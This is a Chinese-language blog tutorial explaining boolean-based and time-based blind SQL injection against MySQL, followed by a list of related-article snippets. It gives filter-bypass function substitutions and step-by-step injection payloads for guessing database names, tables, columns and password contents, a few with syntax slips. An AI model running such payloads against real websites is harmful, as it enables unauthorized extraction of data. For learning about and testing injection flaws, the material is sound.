SQL注入之盲注(布尔盲注和时间盲注)

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量7.2k 收藏 25
点赞数 7
文章标签: sql mysql 安全漏洞 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c_programj/article/details/115557295
版权

SQL之盲注

一、布尔盲注

	当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果,这种情况就叫盲注。
	布尔型盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。

**什么情况下考虑使用布尔盲注?**
    1. 该输入框存在注入点。
	2. 该页面或请求不会回显注入语句执行结果,故无法使用UNION注入。
	3. 对数据库报错进行了处理,无论用户怎么输入都不会显示报错信息,故无法使用报错注入。

常用函数

	length(str)函数 返回字符串的长度
	substr(str,poc,len)截取字符串,poc表示截取字符串的开始位,len表示截取字符串的长度
	ascii()返回字符的ascii码,返回该字符对应的ascii码
	count():返回当前列的数量
	case when (条件) then 代码1 else 代码2 end :条件成立,则执行代码1,否则执行代码2

函数替换

1、如果程序过滤了substr函数,可以用其他函数代替:效果与substr()一样
	left(str,index)从左边第index开始截取
	right(str,index)从右边第index开始截取
	substring(str,index)从左边index开始截取
	mid(str,index,len)截取str从index开始,截取len的长度
	lpad(str,len,padstr)
	rpad(str,len,padstr)在str的左(右)两边填充给定的padstr到指定的长度len,返回填充的结果

在这里插入图片描述

2、如果程序过滤了 = (等于号),可以用in()、like代替,效果一样:

在这里插入图片描述

3、如果程序过滤了ascii(),可以用hex()、bin()、ord()代替,效果一样:

在这里插入图片描述

布尔盲注一般流程

因为盲注不能直接用database()函数得到数据库名,所以步骤如下:
①判断数据库名的长度:and length(database())>11 回显正常;and length(database())>12 回显错误,说明数据库名是等于12个字符。
②猜测数据库名(使用ascii码来依次判断):and (ascii(substr(database(),1,1)))>100 --+ 通过不断测试,确定ascii值,查看asciii表可以得出该字符,通过改变database()后面第一个数字,可以往后继续猜测第二个、第三个字母…
③猜测表名:and (ascii(substr((select table_name from information_schema.tables where table.schema=database() limit 1,1)1,1)>144 --+ 往后继续猜测第二个、第三个字母…
④猜测字段名(列名):and (ascii(substr((select column_name from information_schema.columns where table.schema=database() and table_name=’数据库表名’ limit 0,1)1,1)>105 --+ 经过猜测 ascii为 105 为i 也就是表的第一个列名 id的第一个字母;同样,通过修改 limit 0,1 获取第二个列名 修改后面1,1的获取当前列的其他字段.
⑤猜测字段内容:因为知道了列名,所以直接 select password from users 就可以获取password里面的内容,username也一样 and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+

二、时间盲注

	界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 
	时间盲注与布尔盲注类似。时间型盲注就是利用时间函数的延迟特性来判断注入语句是否执行成功。
	
	**什么情况下考虑使用时间盲注?**
	1. 无法确定参数的传入类型。整型,加单引号,加双引号返回结果都一样
	2. 不会回显注入语句执行结果,故无法使用UNION注入
	3. 不会显示报错信息,故无法使用报错注入
	4. 符合盲注的特征,但不属于布尔型盲注

常用函数

	sleep(n):将程序挂起一段时间 n为n秒。
	if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句。
	
	使用sleep()函数和if()函数:`and (if(ascii(substr(database(),1,1))>100,sleep(10),null))  --+`   如果返回正确则 页面会停顿10秒,返回错误则会立马返回。只有指定条件的记录存在时才会停止指定的秒数。

时间盲注一般流程

①猜测数据库名称长度:
输入:id=1' and If(length(database()) > 1,1,sleep(5))--+
用时:<1s,数据库名称长度>1

输入:id=1' and If(length(database()) >8 ,1,sleep(5))--+
用时:5s,数据库名称长度=8
得出结论:数据库名称长度等于8个字符。
②猜测数据库名称的一个字符:
输入:id=1' and If(ascii(substr(database(),1,1))=97,sleep(5),1)--+
用时:<1s

输入:id=1' and If(ascii(substr(database(),1,1))=115,sleep(5),1)--+
用时:5s
得出结论:数据库名称的第一个字符是小写字母s。
改变substr的值,以此类推第n个字母。最后猜出数据库名称。
③猜测数据库表名:先猜测长度,与上面内容相似。
④猜测数据库字段:先猜测长度,与上面内容相似。
⑤猜测字段内容:先猜测长度,与上面内容相似。

c_programj
关注
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4839
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1278
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
渗透测试-SQL注入布尔盲注时间盲注
lza20001103的博客
04-20 2928
渗透测试-SQL注入布尔盲注时间盲注
sql注入时间盲注
笔墨稠思
11-13 2765
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是延时盲注? 通过web页面返回数据的时间差来判断注入语句是否正确 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 sleep() 将程序挂起一段时间 if(exp1,exp2,exp3) 判断语句,第一个语句正确就执行第二个,否则执行第三个 靶场实战 首先判断是否存在注入
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1042
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
SQL注入-时间盲注
WolvenSec的博客
06-03 2048
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
时间盲注 延时
s_hiy_iyi的博客
09-21 51
由于服务器端拼接了SQL语句,且正确和错误存在同样的回显,即是错误信息被过滤,可以通过页面响应时间进行按位判断数据。由于时间盲注中的函数是在数据库中执行的,但是sleep函数或者benchmark函数的过多执行会让服务器负载过高1.2、原理:当对数据库进行查询操作,如果查询的条件不存在,语句执行的速度非常快,执行时间基本可以认为是0,通过控制sql语句的执行时间来判断。
SQL注入实战之盲注篇(布尔时间盲注
m0_51428325的博客
11-16 4295
首先还是写一下核心的语句吧。 information_schema schemata(schema_name) tables(table_schema,table_name) columns(table_schema,table_name,column_name) select schema_name from information_schema.schemata; select table_name from information_schema.tables where table_
SQL注入盲注(布尔盲注
Marsper的博客
09-23 903
SQL注入盲注 SQL注入布尔注入 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间盲注和报错的盲注。本次主要讲解的是基于布尔盲注布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据 首先我们还是以sqli-labs为载体,第lesson 8。 输入 ?id='1' and 1= 2 -- 页面显示错误,可进行盲注 首先认识几个函数: length()函数:返回字符串的长度 subst
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sqlserver数据库布尔盲注_SQL注入实战之盲注篇(布尔时间盲注
weixin_32179749的博客
01-14 997
首先还是写一下核心的语句吧。information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name)select schema_name from information_schema.schemata;select table_name fr...
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 556
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
SQL注入——时间盲注
heyingcheng的博客
03-07 1122
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) > X, SLEEP(5), 0); ``` 请注意,这只是一个示例脚本,具体的注入方法取决于目标应用程序的漏洞和数据库类型。在实施任何安全测试之前,请确保您已经获得了合法授权,并且只针对您拥有所有权或许可的系统进行测试。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值